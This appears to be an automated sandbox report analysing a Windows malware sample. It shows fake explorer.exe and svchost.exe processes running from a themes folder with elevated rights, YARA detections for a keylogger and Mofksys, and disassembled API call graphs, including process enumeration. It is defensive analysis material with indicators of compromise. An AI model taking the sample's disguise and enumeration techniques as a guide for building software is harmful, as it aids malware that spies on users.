                                              Start time:10:08:05
                                              Start date:30/09/2024
                                              Path:C:\Windows\Resources\Themes\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\windows\resources\themes\explorer.exe" RO
                                              Imagebase:0x400000
                                              File size:759'734 bytes
                                              MD5 hash:6490C0CC4233043407A5C6E1EB702275
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:10
                                              Start time:10:08:05
                                              Start date:30/09/2024
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                              Imagebase:0x7ff7403e0000
                                              File size:55'320 bytes
                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:11
                                              Start time:10:08:06
                                              Start date:30/09/2024
                                              Path:C:\Windows\Resources\Themes\explorer.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\windows\resources\themes\explorer.exe" RO
                                              Imagebase:0x400000
                                              File size:759'734 bytes
                                              MD5 hash:6490C0CC4233043407A5C6E1EB702275
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:Borland Delphi
                                              Yara matches:
                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.2356728288.0000000000539000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000003.2330249640.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 0000000B.00000002.2356069803.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              Target ID:12
                                              Start time:10:08:13
                                              Start date:30/09/2024
                                              Path:C:\Windows\Resources\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\windows\resources\svchost.exe" RO
                                              Imagebase:0x400000
                                              File size:759'655 bytes
                                              MD5 hash:1154F5064F5C17DA195589BD31C809B6
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:13
                                              Start time:10:08:13
                                              Start date:30/09/2024
                                              Path:C:\Windows\System32\consent.exe
                                              Wow64 process (32bit):false
                                              Commandline:consent.exe 6016 322 0000022C4F0331F0
                                              Imagebase:0x7ff7d8700000
                                              File size:186'704 bytes
                                              MD5 hash:DD5032EF160209E470E2612A8A3D5F59
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              Target ID:14
                                              Start time:10:08:14
                                              Start date:30/09/2024
                                              Path:C:\Windows\Resources\svchost.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\windows\resources\svchost.exe" RO
                                              Imagebase:0x400000
                                              File size:759'655 bytes
                                              MD5 hash:1154F5064F5C17DA195589BD31C809B6
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:Borland Delphi
                                              Yara matches:
                                              • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 0000000E.00000002.2431859508.0000000000401000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000E.00000003.2401893281.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000E.00000002.2431975556.0000000000539000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:4.2%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:12%
                                                Total number of Nodes:217
                                                Total number of Limit Nodes:10
                                                execution_graph 24640 4e741c 24650 4e7424 24640->24650 24641 4e77c8 24715 4254d0 11 API calls 24641->24715 24643 4e77e5 24716 425be0 SysFreeString 24643->24716 24645 4e75ba 24683 471e9c 32 API calls 24645->24683 24646 4e77f5 24717 425be0 SysFreeString 24646->24717 24648 4e7802 24718 426c24 13 API calls 24648->24718 24650->24641 24651 4e74bd 24650->24651 24657 4e7561 24650->24657 24707 471e9c 32 API calls 24651->24707 24653 4e75d5 24684 471e9c 32 API calls 24653->24684 24654 4e7810 24657->24645 24662 4e75a1 FindWindowW 24657->24662 24658 4e74d8 24660 4cf5c8 18 API calls 24658->24660 24659 4e75f0 24685 471e9c 32 API calls 24659->24685 24661 4e74e4 24660->24661 24661->24641 24665 4cf628 18 API calls 24661->24665 24662->24641 24664 4e75b3 24662->24664 24664->24641 24673 4e7506 24665->24673 24666 4e760c 24686 4cf5c8 24666->24686 24667 4e7556 CloseHandle 24667->24641 24669 4e7618 24670 4e76c8 EnumWindows 24669->24670 24691 4cf628 24669->24691 24681 4e76de 24670->24681 24673->24667 24676 4e7541 24673->24676 24708 471e9c 32 API calls 24673->24708 24709 4cf648 24673->24709 24674 4e76c2 CloseHandle 24674->24670 24675 4e763a 24675->24674 24680 4cf648 18 API calls 24675->24680 24696 471e9c 32 API calls 24675->24696 24697 425c04 24675->24697 24676->24667 24680->24675 24681->24641 24714 4e02c8 54 API calls 24681->24714 24683->24653 24684->24659 24685->24666 24719 4cf34c 24686->24719 24689 4cf5d7 CreateToolhelp32Snapshot 24689->24669 24690 4cf5e2 24690->24669 24692 4cf34c 17 API calls 24691->24692 24693 4cf633 24692->24693 24694 4cf637 Process32FirstW 24693->24694 24695 4cf642 24693->24695 24694->24675 24695->24675 24696->24675 24698 425bc8 24697->24698 24699 425c0c 24697->24699 24701 425bce SysFreeString 24698->24701 24702 425bdc 24698->24702 24699->24698 24700 425c17 SysReAllocStringLen 24699->24700 24703 425c27 24700->24703 24704 425b98 24700->24704 24701->24702 24702->24675 24703->24675 24705 4261f4 24704->24705 24706 4261de SysAllocStringLen 24704->24706 24705->24675 24706->24704 24706->24705 24707->24658 24708->24673 24710 4cf34c 17 API calls 24709->24710 24711 4cf653 24710->24711 24712 4cf657 Process32NextW 24711->24712 24713 4cf662 24711->24713 24712->24673 24713->24673 24714->24681 24715->24643 24716->24646 24717->24648 24718->24654 24720 4cf35b GetModuleHandleA 24719->24720 24721 4cf490 24719->24721 24720->24721 24722 4cf370 16 API calls 24720->24722 24721->24689 24721->24690 24722->24721 24723 564640 24724 56464d VirtualAlloc 24723->24724 24726 6d8a4b 24728 6d8a50 24726->24728 24731 564678 24728->24731 24734 564685 24731->24734 24732 564812 24733 5646f6 03083A2C 03083A11 24740 564735 24733->24740 24734->24732 24734->24733 24735 564718 03083A2C 24736 564727 03083982 24735->24736 24735->24740 24736->24740 24737 564793 24742 4250a4 24737->24742 24738 564752 03083A11 24738->24740 24739 564761 03083A11 24739->24740 24740->24735 24740->24737 24740->24738 24740->24739 24743 4250ea 24742->24743 24744 425163 24743->24744 24745 425310 24743->24745 24756 425034 24744->24756 24748 425344 24745->24748 24749 425355 24745->24749 24762 425284 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 24748->24762 24752 42539a FreeLibrary 24749->24752 24753 4253be 24749->24753 24751 42534e 24751->24749 24752->24749 24754 4253c7 24753->24754 24755 4253cd ExitProcess 24753->24755 24754->24755 24757 425049 24756->24757 24758 42507f 24756->24758 24757->24758 24763 423a80 24757->24763 24769 426cc4 24757->24769 24773 427860 24757->24773 24758->24732 24762->24751 24764 423aa0 24763->24764 24765 423a88 24763->24765 24764->24757 24779 42342c 24765->24779 24766 423a90 24766->24764 24790 423bb4 11 API calls 24766->24790 24770 426cd4 GetModuleFileNameA 24769->24770 24771 426cf0 24769->24771 24855 426f58 GetModuleFileNameA RegOpenKeyExA 24770->24855 24771->24757 24774 427871 24773->24774 24775 4278a2 24773->24775 24774->24775 24874 426d0c 24774->24874 24775->24757 24780 423443 24779->24780 24781 42343e 24779->24781 24783 42344f 24780->24783 24784 423470 RtlEnterCriticalSection 24780->24784 24785 42347a 24780->24785 24791 422bd0 RtlInitializeCriticalSection 24781->24791 24783->24766 24784->24785 24785->24783 24798 4232e4 24785->24798 24788 4235c7 24788->24766 24789 4235bd RtlLeaveCriticalSection 24789->24788 24790->24764 24792 422bf5 RtlEnterCriticalSection 24791->24792 24793 422bff 24791->24793 24792->24793 24794 422c1d LocalAlloc 24793->24794 24795 422c37 24794->24795 24796 422c97 24795->24796 24797 422c8d RtlLeaveCriticalSection 24795->24797 24796->24780 24797->24796 24802 4232fb 24798->24802 24799 42333c 24803 423363 24799->24803 24809 42307c 24799->24809 24802->24799 24802->24803 24804 42324c 24802->24804 24803->24788 24803->24789 24813 422950 24804->24813 24806 42325c 24807 423269 24806->24807 24820 4231c0 9 API calls 24806->24820 24807->24802 24810 423117 24809->24810 24811 4230a1 24809->24811 24810->24811 24829 422fc0 24810->24829 24811->24803 24817 42296e 24813->24817 24815 42297c 24815->24806 24817->24815 24818 4229dc 24817->24818 24821 422630 24817->24821 24827 4224e4 LocalAlloc 24817->24827 24828 42270c VirtualFree 24818->24828 24820->24807 24822 42263f 24821->24822 24823 42268f 24822->24823 24824 422454 LocalAlloc 24822->24824 24823->24817 24825 422678 24824->24825 24825->24823 24826 42267c VirtualFree 24825->24826 24826->24823 24827->24817 24828->24815 24830 422fd4 24829->24830 24831 423022 24830->24831 24832 42300c 24830->24832 24841 423070 24830->24841 24834 422b3c 3 API calls 24831->24834 24842 422b3c 24832->24842 24835 423020 24834->24835 24835->24841 24852 422e80 9 API calls 24835->24852 24837 423043 24838 423065 24837->24838 24853 422ee0 9 API calls 24837->24853 24854 42256c LocalAlloc 24838->24854 24841->24811 24843 422b66 24842->24843 24844 422bc3 24842->24844 24845 422894 VirtualFree 24843->24845 24844->24835 24846 422b77 24845->24846 24847 4224e4 LocalAlloc 24846->24847 24848 422b87 24847->24848 24849 422b9e 24848->24849 24850 42270c VirtualFree 24848->24850 24849->24844 24851 42256c LocalAlloc 24849->24851 24850->24849 24851->24844 24852->24837 24853->24838 24854->24841 24856 426fda 24855->24856 24857 426f9a RegOpenKeyExA 24855->24857 24873 426d80 12 API calls 24856->24873 24857->24856 24858 426fb8 RegOpenKeyExA 24857->24858 24858->24856 24861 427063 lstrcpyn GetThreadLocale GetLocaleInfoA 24858->24861 24860 426fff RegQueryValueExA 24862 42701f RegQueryValueExA 24860->24862 24864 42703d RegCloseKey 24860->24864 24863 427193 24861->24863 24866 42709a 24861->24866 24862->24864 24863->24771 24864->24771 24866->24863 24867 4270aa lstrlen 24866->24867 24868 4270c3 24867->24868 24868->24863 24869 4270f1 lstrcpyn LoadLibraryExA 24868->24869 24870 42711d 24868->24870 24869->24870 24870->24863 24871 427127 lstrcpyn LoadLibraryExA 24870->24871 24871->24863 24872 42715d lstrcpyn LoadLibraryExA 24871->24872 24872->24863 24873->24860 24875 426d20 24874->24875 24877 426d3c LoadStringA 24874->24877 24876 426cc4 30 API calls 24875->24876 24875->24877 24876->24877 24878 42559c 24877->24878 24883 425570 23 API calls 24878->24883 24880 4255ac 24884 4254ac 11 API calls 24880->24884 24882 4255c4 24882->24775 24883->24880 24884->24882 24885 42545e 24886 423a80 23 API calls 24885->24886 24887 425476 CreateThread 24886->24887 24888 425428 24887->24888 24889 425430 24888->24889 24894 423ab0 24889->24894 24892 425452 24895 423ab5 24894->24895 24896 423ac8 24894->24896 24895->24896 24899 423bb4 11 API calls 24895->24899 24898 4254a2 RtlExitUserThread 24896->24898 24898->24892 24899->24896 24900 425cbc 24901 425cc4 SysAllocStringLen 24900->24901 24902 425bc8 24900->24902 24905 425cd4 SysFreeString 24901->24905 24906 425b98 24901->24906 24903 425bce SysFreeString 24902->24903 24904 425bdc 24902->24904 24903->24904 24907 4261f4 24906->24907 24908 4261de SysAllocStringLen 24906->24908 24908->24906 24908->24907 24909 4fd3a0 GetTickCount 24910 4fd3b4 Sleep 24909->24910 24911 4fd3c3 24910->24911 24911->24910 24912 4fd3de GetTickCount 24911->24912 24913 4fd402 24912->24913 24913->24911

                                                Control-flow Graph

                                                APIs
                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000105,005080A8), ref: 00426F73
                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,005080A8), ref: 00426F91
                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,005080A8), ref: 00426FAF
                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00426FCD
                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,0042705C,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00427016
                                                • RegQueryValueExA.ADVAPI32(?,004271D8,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,0042705C,?,80000001), ref: 00427034
                                                • RegCloseKey.ADVAPI32(?,00427063,00000000,?,?,00000000,0042705C,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00427056
                                                • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00427073
                                                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00427080
                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00427086
                                                • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 004270B1
                                                • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00427106
                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00427116
                                                • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00427142
                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00427152
                                                • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 0042717C
                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 0042718C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                • API String ID: 1759228003-2375825460
                                                • Opcode ID: ae58131e95117afb35a294d1eeeede93b20aad7f2b23c3b62aea4443ab3f3cba
                                                • Instruction ID: 0e10cd6e0dd10fa29fec1e3e1da35663d577b7123c6a2922c9f71c4ecc8ba752
                                                • Opcode Fuzzy Hash: ae58131e95117afb35a294d1eeeede93b20aad7f2b23c3b62aea4443ab3f3cba
                                                • Instruction Fuzzy Hash: C7616771F0421DBEEB10D6E5DD45FEF77BC9F08704F804096B604E6282D6BC9A458B68

                                                Control-flow Graph

                                                APIs
                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000105,005080A8), ref: 00426F73
                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,005080A8), ref: 00426F91
                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,005080A8), ref: 00426FAF
                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00426FCD
                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,0042705C,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00427016
                                                • RegQueryValueExA.ADVAPI32(?,004271D8,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,0042705C,?,80000001), ref: 00427034
                                                • RegCloseKey.ADVAPI32(?,00427063,00000000,?,?,00000000,0042705C,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00427056
                                                • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00427073
                                                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00427080
                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00427086
                                                • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 004270B1
                                                • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00427106
                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00427116
                                                • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00427142
                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00427152
                                                • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 0042717C
                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 0042718C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                • API String ID: 1759228003-2375825460
                                                • Opcode ID: ae58131e95117afb35a294d1eeeede93b20aad7f2b23c3b62aea4443ab3f3cba
                                                • Instruction ID: 0e10cd6e0dd10fa29fec1e3e1da35663d577b7123c6a2922c9f71c4ecc8ba752
                                                • Opcode Fuzzy Hash: ae58131e95117afb35a294d1eeeede93b20aad7f2b23c3b62aea4443ab3f3cba
                                                • Instruction Fuzzy Hash: C7616771F0421DBEEB10D6E5DD45FEF77BC9F08704F804096B604E6282D6BC9A458B68

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 25 427063-427094 lstrcpyn GetThreadLocale GetLocaleInfoA 26 427193-427199 25->26 27 42709a-42709e 25->27 28 4270a0-4270a4 27->28 29 4270aa-4270c1 lstrlen 27->29 28->26 28->29 30 4270c6-4270cc 29->30 31 4270d9-4270e2 30->31 32 4270ce-4270d7 30->32 31->26 34 4270e8-4270ef 31->34 32->31 33 4270c3 32->33 33->30 35 4270f1-42711b lstrcpyn LoadLibraryExA 34->35 36 42711d-42711f 34->36 35->36 36->26 37 427121-427125 36->37 37->26 38 427127-42715b lstrcpyn LoadLibraryExA 37->38 38->26 39 42715d-427191 lstrcpyn LoadLibraryExA 38->39 39->26
                                                APIs
                                                • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00427073
                                                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00427080
                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00427086
                                                • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 004270B1
                                                • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00427106
                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00427116
                                                • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00427142
                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00427152
                                                • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 0042717C
                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 0042718C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                • API String ID: 1599918012-2375825460
                                                • Opcode ID: 9e2ade6073610427fdacc7a77669d88accc657c9afcb484c93a8f93563c00e38
                                                • Instruction ID: 6819206e02db4054dcb3158c82514520f17620e85cdb7c91ac9952129f30eab0
                                                • Opcode Fuzzy Hash: 9e2ade6073610427fdacc7a77669d88accc657c9afcb484c93a8f93563c00e38
                                                • Instruction Fuzzy Hash: C3316471F04219BEDB15DAE8D845FEF77BD9F48304F8040A6A144E3286D6BC9E458B68

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 25 427063-427094 lstrcpyn GetThreadLocale GetLocaleInfoA 26 427193-427199 25->26 27 42709a-42709e 25->27 28 4270a0-4270a4 27->28 29 4270aa-4270c1 lstrlen 27->29 28->26 28->29 30 4270c6-4270cc 29->30 31 4270d9-4270e2 30->31 32 4270ce-4270d7 30->32 31->26 34 4270e8-4270ef 31->34 32->31 33 4270c3 32->33 33->30 35 4270f1-42711b lstrcpyn LoadLibraryExA 34->35 36 42711d-42711f 34->36 35->36 36->26 37 427121-427125 36->37 37->26 38 427127-42715b lstrcpyn LoadLibraryExA 37->38 38->26 39 42715d-427191 lstrcpyn LoadLibraryExA 38->39 39->26
                                                APIs
                                                • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00427073
                                                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00427080
                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00427086
                                                • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 004270B1
                                                • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00427106
                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00427116
                                                • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00427142
                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00427152
                                                • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 0042717C
                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 0042718C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                • API String ID: 1599918012-2375825460
                                                • Opcode ID: 9e2ade6073610427fdacc7a77669d88accc657c9afcb484c93a8f93563c00e38
                                                • Instruction ID: 6819206e02db4054dcb3158c82514520f17620e85cdb7c91ac9952129f30eab0
                                                • Opcode Fuzzy Hash: 9e2ade6073610427fdacc7a77669d88accc657c9afcb484c93a8f93563c00e38
                                                • Instruction Fuzzy Hash: C3316471F04219BEDB15DAE8D845FEF77BD9F48304F8040A6A144E3286D6BC9E458B68

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 85 4fd3a0-4fd3af GetTickCount 86 4fd3b4-4fd3c1 Sleep 85->86 87 4fd439-4fd43c 86->87 88 4fd3c3-4fd3cf 86->88 91 4fd43e-4fd448 call 4fd214 87->91 92 4fd44a-4fd44c 87->92 89 4fd437 88->89 90 4fd3d1-4fd3dc 88->90 89->87 90->89 93 4fd3de-4fd400 GetTickCount 90->93 91->92 92->86 95 4fd414-4fd420 93->95 96 4fd402-4fd412 93->96 95->89 98 4fd422-4fd432 call 4fdb20 95->98 96->95 98->89
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
